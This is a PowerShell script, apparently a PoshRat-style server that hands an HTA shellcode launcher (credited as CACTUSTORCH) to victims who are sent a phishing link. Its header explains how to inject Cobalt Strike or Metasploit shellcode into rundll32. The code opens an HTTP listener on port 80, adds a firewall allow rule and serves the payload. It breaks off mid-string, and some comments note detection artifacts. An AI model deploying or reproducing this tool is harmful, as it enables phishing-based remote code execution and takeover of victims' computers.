<# Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta To change your server, simply find and replace 192.168.1.1 with your server in the code. #> <# Moving Credits for CACTUSTORCH HERE I was in escape sequence hell ;-) ' ( ) ( ) ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| ' ' Author: Vincent Yiu (@vysecurity) ' Credits: ' - @cn33liz: Inspiration with StarFighter ' - @tiraniddo: James Forshaw for DotNet2JScript ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into ' An HTA shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. ' Usage: ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework ' Run: cat payload.bin | base64 -w 0 ' Copy the base64 encoded payload into the code variable below. ' Replace with binary name that you want to inject into. 
This can be anything that exists both in SYSWOW64 and SYSTEM32 #>

# Receive-Request: drains the body of a single HttpListener request and
# prints it to the console with Write-Host. Nothing is written to the
# pipeline, so callers cannot capture the text as a return value.
#   $Request - the System.Net.HttpListenerRequest to read (the object exposed
#              as $context.Request in the loop below). Not validated.
function Receive-Request {
    param( $Request )
    $output = ""
    # One byte more than the declared Content-Length, so the final Read
    # comes back short and terminates the loop below.
    # NOTE(review): ContentLength64 is -1 when the request carries no
    # Content-Length header, which makes $size 0 here — confirm that case
    # is acceptable for the callers.
    $size = $Request.ContentLength64 + 1
    $buffer = New-Object byte[] $size
    do {
        $count = $Request.InputStream.Read($buffer, 0, $size)
        # Each chunk is decoded with the request's own charset and appended.
        $output += $Request.ContentEncoding.GetString($buffer, 0, $count)
    } until($count -lt $size)   # a short read means the stream is drained
    $Request.InputStream.Close()
    write-host $output
}

# --- Listener setup -------------------------------------------------------
$listener = New-Object System.Net.HttpListener
# Wildcard host (+) on TCP/80: binds every interface of the machine. On
# Windows, an HttpListener prefix like this typically needs an elevated
# process or a pre-registered URL ACL to start.
$listener.Prefixes.Add('http://+:80/')
# Mutates the host firewall: removes any earlier rule of the same name, then
# re-adds an inbound allow for TCP/80. Both commands require elevation.
# From a defender's view the rule name "PoshRat 80" and these netsh command
# lines are durable host artifacts (firewall rule list, process/command-line
# telemetry) that are worth alerting on.
netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null
$listener.Start()
'Listening ...'   # bare string expression: emitted to the console/pipeline

# --- Request loop ---------------------------------------------------------
# Runs forever; each iteration handles exactly one inbound request.
while ($true) {
    $context = $listener.GetContext() # blocks until request is received
    $request = $context.Request
    $response = $context.Response
    $hostip = $request.RemoteEndPoint   # remote endpoint (address:port) of the caller
    #Use this for One-Liner Start
    # Any GET whose URL path ends in /app.hta is answered with the HTA text
    # assigned to $htacode, sent as application/hta.
    if ($request.Url -match '/app.hta$' -and ($request.HttpMethod -eq "GET")) {
        $enc = [system.Text.Encoding]::UTF8
        $response.ContentType = 'application/hta'
        $htacode = '